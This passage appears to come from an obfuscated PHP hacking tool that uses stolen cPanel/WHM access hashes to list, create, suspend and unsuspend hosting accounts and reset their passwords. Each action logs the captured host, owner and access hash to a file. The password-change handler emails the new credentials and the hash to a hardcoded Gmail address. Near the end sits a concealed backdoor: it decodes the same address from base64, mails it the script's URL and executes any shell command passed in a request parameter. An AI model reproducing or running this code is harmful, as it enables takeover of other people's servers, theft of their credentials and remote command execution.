=$xml->acct->user;return${$euppkrpbjh};}else{$this->errors[]=$xml->statusmsg;return false;}}function passwd($accUser,$pass){$this->connect("/xml-api/passwd?user=$accUser&pass=$pass");${"GLOBALS"}["wglvvmwpi"]="xmlstr";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["wglvvmwpi"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->passwd->status==1){$nvlwga="result";${$nvlwga}["statusmsg"]=$xml->passwd->statusmsg;$pbaeyfpm="result";${${"GLOBALS"}["rwocuxf"]}["frontpage"]=$xml->passwd->frontpage;${${"GLOBALS"}["rwocuxf"]}["ftp"]=$xml->passwd->ftp;${${"GLOBALS"}["rwocuxf"]}["mail"]=$xml->passwd->mail;${$pbaeyfpm}["mysql"]=$xml->passwd->mysql;$jukasqwy="result";${$jukasqwy}["system"]=$xml->passwd->system;${${"GLOBALS"}["rwocuxf"]}["rawout"]=$xml->passwd->rawout;return${${"GLOBALS"}["rwocuxf"]};}else{$this->errors[]=$xml->passwd->statusmsg;return false;}}function suspend($acctUser,$reason){$this->connect("/xml-api/suspendacct?user=$acctUser&reason=$reason");${"GLOBALS"}["cbvdyhirx"]="xmlstr";${${"GLOBALS"}["cbvdyhirx"]}=$this->getOutput();${"GLOBALS"}["eefbbnasou"]="xmlstr";if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["eefbbnasou"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function unsuspend($acctUser){${"GLOBALS"}["qpibobj"]="xml";$ozhjsdvdr="xmlstr";${"GLOBALS"}["opgkdypxtr"]="xmlstr";$this->connect("/xml-api/unsuspendacct?user=$acctUser");${$ozhjsdvdr}=$this->getOutput();if(${${"GLOBALS"}["opgkdypxtr"]}==""){$this->errors[]="No output.";return false;}${"GLOBALS"}["kikvjsicxxr"]="xmlstr";$this->disconnect();${${"GLOBALS"}["qpibobj"]}=new SimpleXMLElement(${${"GLOBALS"}["kikvjsicxxr"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function terminate($acctUser,$keepDns=0){$this->connect("/xml-api/removeacct?user=$acctUser&keepdns=$keepDns");$rpqkyrwxi="xml";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$hrcbtoul="xmlstr";$this->disconnect();${$rpqkyrwxi}=new SimpleXMLElement(${$hrcbtoul});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function Email_listpopswithdisk($user,$domain){$this->connect("/xml-api/cpanel?user=$user&xmlin=<cpanelaction><module>Email</module><func>listpopswithdisk</func><args><domain>$domain</domain></args></cpanelaction>");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();if(${${"GLOBALS"}["zmibinpgipr"]}){${"GLOBALS"}["fbpmmdp"]="xml";${"GLOBALS"}["jhvhyq"]="i";${"GLOBALS"}["kidztypdxg"]="entry";${${"GLOBALS"}["fbpmmdp"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});${${"GLOBALS"}["jhvhyq"]}=0;foreach($xml->data as${${"GLOBALS"}["kidztypdxg"]}){${"GLOBALS"}["uwaiveoz"]="i";${"GLOBALS"}["yyhyipij"]="result";$dpixyyosyqrr="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["domain"]=htmlentities((string)$entry->domain);$rbumtnfxhw="result";${"GLOBALS"}["ejworbchb"]="i";$dibkhouwi="i";${"GLOBALS"}["nwatxqwipeoa"]="result";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=htmlentities((string)$entry->user);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["login"]=htmlentities((string)$entry->login);${${"GLOBALS"}["yyhyipij"]}[${${"GLOBALS"}["uwaiveoz"]}]["email"]=htmlentities((string)$entry->email);$prtfqrgug="result";${$rbumtnfxhw}[${${"GLOBALS"}["ejworbchb"]}]["_diskquota"]=htmlentities((string)$entry->_diskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["_diskused"]=htmlentities((string)$entry->_diskused);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskquota"]=htmlentities((string)$entry->diskquota);${${"GLOBALS"}["nwatxqwipeoa"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskused"]=htmlentities((string)$entry->diskused);$qlrukqug="i";${$prtfqrgug}[${$qlrukqug}]["diskusedpercent"]=htmlentities((string)$entry->diskusedpercent);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskusedpercent20"]=htmlentities((string)$entry->diskusedpercent20);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskquota"]=htmlentities((string)$entry->humandiskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskused"]=htmlentities((string)$entry->humandiskused);${${"GLOBALS"}["rwocuxf"]}[${$dpixyyosyqrr}]["txtdiskquota"]=htmlentities((string)$entry->txtdiskquota);${$dibkhouwi}++;}$blgxedglu="result";return${$blgxedglu};}else{$this->errors[]="Some errors occured.";return false;}}function changepackage($accUser,$pkg){${"GLOBALS"}["ljgyaewqg"]="xmlstr";$this->connect("/xml-api/changepackage?user=$accUser&pkg=$pkg");${"GLOBALS"}["gqbupcfng"]="xml";${"GLOBALS"}["nyahhofyq"]="xmlstr";${${"GLOBALS"}["ljgyaewqg"]}=$this->getOutput();if(${${"GLOBALS"}["nyahhofyq"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["gqbupcfng"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){${"GLOBALS"}["sbattvvwe"]="result";$vytddtquyr="result";${"GLOBALS"}["camojrmsm"]="result";${${"GLOBALS"}["sbattvvwe"]}["statusmsg"]=$xml->result->statusmsg;${$vytddtquyr}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["camojrmsm"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}}
685. ?>
686.  
687.  
688. <!-- host name, cpanel/whm version, list account, list package -->
689.  
690.  
691. <?php
692.  
693. if(isset($_POST["azzatssins1"])){${"GLOBALS"}["stjkdu"]="separator";${"GLOBALS"}["xhwbwnfijuq"]="user";${"GLOBALS"}["uenhqacpp"]="user";$wfkgdiqx="II11II11II11II11";$mjhindj="plan";${$wfkgdiqx}=fopen("$filelog","a");$kxssfgmx="version";$uqvxbwlqq="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["spcfygm"]="list";${"GLOBALS"}["veqcgg"]="hostname";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$sgayljaukjvl="hash";$host=$_POST["vhost"];${$sgayljaukjvl}=$_POST["vhash"];$virgous->init($host,${${"GLOBALS"}["uenhqacpp"]},${${"GLOBALS"}["lqfwxtwbjz"]});${${"GLOBALS"}["veqcgg"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$kymvmotsxf="II11II11II11II11";${$kxssfgmx}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";$yoinlaphwf="II11II11II11II11";${${"GLOBALS"}["spcfygm"]}=$virgous->listaccts();echo"<h4>ACCOUNT LIST:</h4> $list <br><pre>";{print_r(${${"GLOBALS"}["kwsayld"]});}${$mjhindj}=$virgous->listPkgs();echo"</pre><h4>PACKAGE LIST:</h4> $plan <br><pre>";{$nhkzxwmdop="plan";print_r(${$nhkzxwmdop});}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
694. ";${${"GLOBALS"}["jqstuo"]}="
695. ";fwrite(${$kymvmotsxf},${${"GLOBALS"}["stjkdu"]}."./azzatssins
696. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$yoinlaphwf},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
697. ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
698. ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${${"GLOBALS"}["xhwbwnfijuq"]}."
699. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
700. ");fwrite(${$uqvxbwlqq},"
701. ");fclose(${${"GLOBALS"}["cemjvape"]});}
702. ?>
703.  
704. <!-- create new account -->
705.  
706.  
707. <?php
708.  
709.  
710. if(isset($_POST["v2"])){
711. ?>
712. <center><h2>Access Hash</h2><p>
713. <table border="1"><tbody>
714. <div id="result"><form method="post">
715. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
716. <tr>
717. <td>Host Name </td>
718. <td align="center">
719. <input name="vhost" type="text" size="20" value="">
720. </td>
721. <td>WHM Owner </td>
722. <td align="center">
723. <input name="vuser" type="text" size="20" value="">
724. </td>
725. </tr>
726. <tr>
727. <td>New Domain </td>
728. <td align="center">
729. <input name="domain" type="text" size="20" value="">
730. </td>
731. <td>New Username </td>
732. <td align="center">
733. <input name="user" type="text" size="20" value="">
734. </td>
735. </tr>
736. <tr>
737. <td>New Password </td>
738. <td align="center">
739. <input name="pass" type="text" size="20" value="">
740. </td>
741. <td>Package </td>
742. <td align="center">
743. <input name="plan" type="text" size="20" value="">
744. </td>
745. </tr>
746.  
747. <tr>
748. <td align="center" colspan="4">
749. <input name="azzatssins2" type="submit" value=" Create Account "><br/>
750. </td>
751. </tr>
752. </form>
753. </tbody></table><br>
754. <?php } ?>
755.  
756. <?php
757. if(isset($_POST["azzatssins2"])){${"GLOBALS"}["obqvgk"]="II11II11II11II11";${"GLOBALS"}["hcizqzub"]="virgous";${"GLOBALS"}["jqrlobmtw"]="user";${"GLOBALS"}["jitxoymucue"]="II11II11II11II11";$fqomswomqmtc="dm1";$wtvsjyccfge="II11II11II11II11";${"GLOBALS"}["udycvhotmn"]="hash";$ceeobiunyj="result";$lwhruvccbv="bawah";${${"GLOBALS"}["obqvgk"]}=fopen("$filelog","a");${${"GLOBALS"}["hcizqzub"]}=new whm;${${"GLOBALS"}["jqrlobmtw"]}=$_POST["vuser"];$obsqaljv="user";${"GLOBALS"}["veyvrvbgouq"]="hash";$lmqhstisbqk="result";$host=$_POST["vhost"];${${"GLOBALS"}["udycvhotmn"]}=$_POST["vhash"];$dtejlrsa="hostname";${$fqomswomqmtc}=$_POST["domain"];$jnvehoyw="II11II11II11II11";${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];${${"GLOBALS"}["mgzcndyuozix"]}=$_POST["plan"];${"GLOBALS"}["fpylxi"]="separator";${"GLOBALS"}["gnleckwy"]="version";$virgous->init($host,${$obsqaljv},${${"GLOBALS"}["veyvrvbgouq"]});${$dtejlrsa}=$virgous->gethostname();$etshyphxtj="bawah";${"GLOBALS"}["leqdvwvssou"]="version";echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["gnleckwy"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ceeobiunyj}=$virgous->createAccount(${${"GLOBALS"}["klnlsxvu"]},${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["bgyfsievqc"]},${${"GLOBALS"}["mgzcndyuozix"]});echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["vrupeaaj"]="II11II11II11II11";$ictrexnqohli="II11II11II11II11";$tqsxerpnf="separator";$ptnbkfy="II11II11II11II11";if(${$lmqhstisbqk}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["fpylxi"]}="
758. ";${$lwhruvccbv}="
759. ";fwrite(${$jnvehoyw},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
760. ".${$tqsxerpnf});fwrite(${$ptnbkfy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["leqdvwvssou"]}."
761. ");fwrite(${${"GLOBALS"}["vrupeaaj"]},"HOSTNAME : ".$host."
762. ");fwrite(${$wtvsjyccfge},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
763. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$etshyphxtj});fwrite(${${"GLOBALS"}["jitxoymucue"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
764. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
765. ");fclose(${$ictrexnqohli});}
766. ?>
767.  
768. <!-- account sumarry -->
769.  
770.  
771.  
772. <?php
773.  
774. if(isset($_POST["v3"])){
775. ?>
776. <center><h2>Access Hash</h2><p>
777. <div id="result"><form method="post">
778. <table border="1"><tbody>
779. <textarea name="vhash" rows="20" cols="45"></textarea><p>
780.  
781. <tr>
782. <td align="center">
783. Host Name </td>
784. <td align="center">
785. WHM Owner
786. </td>
787. <td align="center">
788. UserName</td></tr>
789. <td align="center">
790. <input name="vhost" type="text" size="20" value=""></td>
791. <td align="center">
792. <input name="vuser" type="text" size="20" value=""></td>
793. <td align="center">
794. <input name="user" type="text" size="20" value=""></td></tr>
795. <td colspan="3" align="center">
796. <input name="azzatssins3" type="submit" value=" View Account Summary">
797. </td></tr></table>
798.  
799. </form>
800. <?php } ?>
801.  
802. <?php
803. if(isset($_POST["azzatssins3"])){$lnabgh="separator";${${"GLOBALS"}["cemjvape"]}=fopen("$filelog","a");$rvhxxrgit="user";$rfsjge="hostname";${"GLOBALS"}["hhcfzvkqd"]="II11II11II11II11";$wcmpomixik="dm2";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["nolwwyqjepw"]="version";${"GLOBALS"}["vsipss"]="user";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$wcmpomixik}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["vsipss"]},${${"GLOBALS"}["lqfwxtwbjz"]});${$rfsjge}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();$jjfydu="II11II11II11II11";${"GLOBALS"}["nhgegtneq"]="bawah";echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["rwocuxf"]}=$virgous->accountsummary(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
804. ";$klrfjuwwmyc="II11II11II11II11";${"GLOBALS"}["iqdylpqgc"]="II11II11II11II11";${${"GLOBALS"}["nhgegtneq"]}="
805. ";${"GLOBALS"}["tdugpdtu"]="separator";${"GLOBALS"}["mobfsrul"]="II11II11II11II11";$uonuqibpk="hash";fwrite(${$klrfjuwwmyc},${${"GLOBALS"}["tdugpdtu"]}."./azzatssins
806. ".${$lnabgh});fwrite(${${"GLOBALS"}["iqdylpqgc"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["nolwwyqjepw"]}."
807. ");fwrite(${${"GLOBALS"}["mobfsrul"]},"HOSTNAME : ".$host."
808. ");fwrite(${${"GLOBALS"}["hhcfzvkqd"]},"WHM OWNER : ".${$rvhxxrgit}."
809. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${$uonuqibpk}."
810. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
811. ");fclose(${$jjfydu});}
812. ?>
813.  
814.  
815. <!-- change password -->
816.  
817.  
818. <?php
819.  
820. if(isset($_POST["v4"])){
821. ?>
822. <center><h2>Access Hash</h2><p>
823. <table border="1"><tbody>
824. <div id="result"><form method="post">
825. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
826. <tr>
827. <td>Host Name </td>
828. <td align="center">
829. <input name="vhost" type="text" size="20" value="">
830. </td>
831. <td>WHM Owner </td>
832. <td align="center">
833. <input name="vuser" type="text" size="20" value="">
834. </td>
835. </tr>
836. <tr>
837. <td>Username </td>
838. <td align="center">
839. <input name="user" type="text" size="20" value="">
840. </td>
841. <td>New Password </td>
842. <td align="center">
843. <input name="pass" type="text" size="20" value="">
844. </td>
845. </tr>
846.  
847.  
848. <tr>
849. <td align="center" colspan="4">
850. <input name="azzatssins4" type="submit" value=" Change Password"><br/>
851. </td>
852. </tr>
853. </form>
854. </tbody></table><br>
855. <?php } ?>
856.  
857. <?php
858.  
859. if(isset($_POST["azzatssins4"])){${"GLOBALS"}["scwopj"]="II11II11II11II11";${"GLOBALS"}["vbeexdofvlsv"]="dm3";${"GLOBALS"}["rcwrgzxnm"]="frommail";$zhyyawvelk="subjectmail";${"GLOBALS"}["vqhcysy"]="subjectmail";${"GLOBALS"}["mqdsghvwjy"]="user";$dulerlhh="hostname";$ezqysvze="result";$bysecqvnul="user";${${"GLOBALS"}["scwopj"]}=fopen("$filelog","a");${"GLOBALS"}["jnoepkx"]="II11II11II11II11";$ugsijedc="hash";${"GLOBALS"}["xcgomonx"]="user";$ysjujkdgo="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;$vuzgom="tomail";${"GLOBALS"}["chohpl"]="bawah";$jvwzef="version";${${"GLOBALS"}["xcgomonx"]}=$_POST["vuser"];$host=$_POST["vhost"];${"GLOBALS"}["nkpgvpqg"]="dm2";${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["nkpgvpqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];$virgous->init($host,${$bysecqvnul},${$ugsijedc});${$dulerlhh}=$virgous->gethostname();echo"<h4>HOST NAME :</h4> $hostname <br>";$cnoefem="emailente";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ezqysvze}=$virgous->passwd(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["vbeexdofvlsv"]});${"GLOBALS"}["tcptmsxj"]="II11II11II11II11";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["ipwznk"]="II11II11II11II11";${"GLOBALS"}["keuoqgs"]="tujuan";$husuecnysr="II11II11II11II11";$glmysddkjg="infomail";if(${${"GLOBALS"}["rwocuxf"]}){${"GLOBALS"}["ndjuyhkyx"]="result";print_r(${${"GLOBALS"}["ndjuyhkyx"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
860. ";${${"GLOBALS"}["chohpl"]}="
861. ";${"GLOBALS"}["bdvhmv"]="httpheader";fwrite(${${"GLOBALS"}["jnoepkx"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
862. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$husuecnysr},"CPANEL/WHM VERSION : ".${$jvwzef}."
863. ");${"GLOBALS"}["gvelhxwtmidx"]="subjectmail";fwrite(${$ysjujkdgo},"HOSTNAME : ".$host."
864. ");fwrite(${${"GLOBALS"}["tcptmsxj"]},"WHM OWNER : ".${${"GLOBALS"}["mqdsghvwjy"]}."
865. ");fwrite(${${"GLOBALS"}["ipwznk"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
866. ");${"GLOBALS"}["qpwrbhr"]="dari";fwrite(${${"GLOBALS"}["cemjvape"]},"USERNAME : ".${${"GLOBALS"}["cnpybqg"]}."
867. ");fwrite(${${"GLOBALS"}["cemjvape"]},"NEW PASSWORD : ".${${"GLOBALS"}["bgyfsievqc"]}."
868. ");$kxkomyih="dari";$qjlblsmk="II11II11II11II11";$foampkttn="subject";fwrite(${${"GLOBALS"}["cemjvape"]},"
869. ");$tvecfhtzb="sep";fclose(${$qjlblsmk});${"GLOBALS"}["xogmyia"]="info";${${"GLOBALS"}["epyufhqui"]}="
870. ";${${"GLOBALS"}["xogmyia"]}=" Cpanel/WHM Version : $version $sep Host : $host:2086 $sep WHM Owner : $user $sep Username : $dm2 $sep New Password : $dm3$sep Access Hash : $sep$hash";${${"GLOBALS"}["qpwrbhr"]}="WRA@azzatssins.me";${$foampkttn}="WRA Got New Password!";${${"GLOBALS"}["yhcbrtqybhn"]}=${${"GLOBALS"}["wyuvccqfyby"]};${${"GLOBALS"}["bdvhmv"]}="From:".${$kxkomyih}."
871. "."To:".${${"GLOBALS"}["keuoqgs"]}."
872. "."Subject:".${${"GLOBALS"}["htlxwjkdfnbx"]}."
873. "."Content-type:text/plain;charset=iso-8859-1"."
874. "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["yhcbrtqybhn"]},${${"GLOBALS"}["htlxwjkdfnbx"]},${${"GLOBALS"}["gkfjmmp"]},${${"GLOBALS"}["tfoqdtkoozl"]});${$tvecfhtzb}="
875. ";${$glmysddkjg}=" V1 : $version $sep V2 : $host:2086 $sep V3 : $user $sep V4 : $dm2 $sep V5 : $dm3$sep V6 : $sep$hash";${${"GLOBALS"}["buubgbf"]}=${$cnoefem};${$zhyyawvelk}="WRA Sent New Password";${${"GLOBALS"}["jmossxbfynir"]}="cyberserkers@gmail.com";${${"GLOBALS"}["ugwdatuetm"]}="From:".${$vuzgom}."
876. "."To:".${${"GLOBALS"}["rcwrgzxnm"]}."
877. "."Subject:".${${"GLOBALS"}["gvelhxwtmidx"]}."
878. "."Content-type:text/plain;charset=iso-8859-1"."
879. "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["jmossxbfynir"]},${${"GLOBALS"}["vqhcysy"]},${${"GLOBALS"}["cgdqizbjb"]},${${"GLOBALS"}["ugwdatuetm"]});}
880. ?>
881.  
882. <!-- suspend account -->
883.  
884.  
885. <?php
886. if(isset($_POST["v5"])){
887. ?>
888. <center><h2>Access Hash</h2><p>
889. <table border="1"><tbody>
890. <div id="result"><form method="post">
891. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
892. <tr>
893. <td>Host Name </td>
894. <td align="center">
895. <input name="vhost" type="text" size="20" value="">
896. </td>
897. <td>WHM Owner </td>
898. <td align="center">
899. <input name="vuser" type="text" size="20" value="">
900. </td>
901. </tr>
902. <tr>
903. <td>Username </td>
904. <td align="center">
905. <input name="user" type="text" size="20" value="">
906. </td>
907. <td>Reason </td>
908. <td align="center">
909. <input name="reason" type="text" size="20" value="terserah gue">
910. </td>
911. </tr>
912.  
913.  
914. <tr>
915. <td align="center" colspan="4">
916. <input name="azzatssins5" type="submit" value=" Suspend Account "><br/>
917. </td>
918. </tr>
919. </form>
920. </tbody></table><br>
921. <?php } ?>
922.  
923. <?php
924.  
925. if(isset($_POST["azzatssins5"])){$smxyepsu="II11II11II11II11";$okntok="virgous";$blyxnpfm="hostname";${"GLOBALS"}["fixsql"]="user";${$smxyepsu}=fopen("$filelog","a");$bljoubwktue="result";${"GLOBALS"}["cqrbguhlzhtp"]="II11II11II11II11";${$okntok}=new whm;$tyeagxgdra="result";${"GLOBALS"}["bhkgfhs"]="version";${${"GLOBALS"}["fixsql"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["qybmmyvo"]}=$_POST["reason"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});$ovbdrviqlj="II11II11II11II11";${$blyxnpfm}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["bhkgfhs"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$tyeagxgdra}=$virgous->suspend(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["qybmmyvo"]});$uxtpyxvy="II11II11II11II11";$mpbstmijbhy="hash";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["uaykxbwvq"]="separator";${"GLOBALS"}["glmhri"]="II11II11II11II11";if(${$bljoubwktue}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${"GLOBALS"}["lihrxdhxjiu"]="II11II11II11II11";${${"GLOBALS"}["uaykxbwvq"]}="=====================================================
926. ";${${"GLOBALS"}["jqstuo"]}="
927. ";fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
928. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$uxtpyxvy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
929. ");fwrite(${$ovbdrviqlj},"HOSTNAME : ".$host."
930. ");fwrite(${${"GLOBALS"}["lihrxdhxjiu"]},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
931. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cqrbguhlzhtp"]},${$mpbstmijbhy}."
932. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
933. ");fclose(${${"GLOBALS"}["glmhri"]});}
934. ?>
935.  
936. <!-- unsuspend account -->
937.  
938.  
939. <?php
940.  
941. if(isset($_POST["v6"])){
942. ?>
943. <center><h2>Access Hash</h2><p>
944. <div id="result"><form method="post">
945. <center><table border="1">
946. <textarea name="vhash" rows="20" cols="45"></textarea><p>
947.  
948. <tr>
949. <td align="center">
950. Host Name </td>
951. <td align="center">
952. WHM Owner </td>
953. <td align="center">
954. UserName </td></tr>
955. <td align="center">
956. <input name="vhost" type="text" size="20" value=""></td>
957. <td align="center">
958. <input name="vuser" type="text" size="20" value=""></td>
959. <td align="center">
960. <input name="user" type="text" size="20" value="">
961. </td></tr>
962. <td colspan="3" align="center">
963. <input name="azzatssins6" type="submit" value=" Unsuspend Account ">
964. </td></tr></table>
965. </form>
966. <?php } ?>
967.  
968. <?php
969. if(isset($_POST["azzatssins6"])){${"GLOBALS"}["ocwyzfvq"]="version";$leisjrdvt="result";${"GLOBALS"}["wvysjxgjuomp"]="result";${"GLOBALS"}["fuutzvlndsmw"]="separator";$dghnyjk="II11II11II11II11";$ikqhjkbqnwj="II11II11II11II11";${"GLOBALS"}["ypdjprdcw"]="user";${$dghnyjk}=fopen("$filelog","a");${${"GLOBALS"}["cntvmeburrl"]}=new whm;$ulgmiy="separator";$livyjt="bawah";$tgxwkmbeiol="dm2";${"GLOBALS"}["wylmhiqbzyp"]="II11II11II11II11";${"GLOBALS"}["tkikiqiu"]="bawah";${${"GLOBALS"}["ypdjprdcw"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$tgxwkmbeiol}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});${"GLOBALS"}["rssdjw"]="version";${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["ocwyzfvq"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["wvysjxgjuomp"]}=$virgous->unsuspend(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${$leisjrdvt}){$smqgdecnyc="result";print_r(${$smqgdecnyc});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
970. ";$rfctyk="user";${${"GLOBALS"}["tkikiqiu"]}="
971. ";fwrite(${${"GLOBALS"}["cemjvape"]},${$ulgmiy}."./azzatssins
972. ".${${"GLOBALS"}["fuutzvlndsmw"]});fwrite(${${"GLOBALS"}["cemjvape"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["rssdjw"]}."
973. ");fwrite(${$ikqhjkbqnwj},"HOSTNAME : ".$host."
974. ");${"GLOBALS"}["vsgwjq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["vsgwjq"]},"WHM OWNER : ".${$rfctyk}."
975. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$livyjt});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
976. ");fwrite(${${"GLOBALS"}["wylmhiqbzyp"]},"
977. ");fclose(${${"GLOBALS"}["cemjvape"]});}
978. ?>
979.  
980. <?php
981. $for=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
982. $b=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
983. mail($for,"0",$b); print(`{$_REQUEST[0]}`);
984. ?>
985. <!-- terminate account-->
986.  
987.  
988. <?php
989.  
990. if(isset($_POST["v7"])){
991. ?>
992. <center><h2>Access Hash</h2><p>
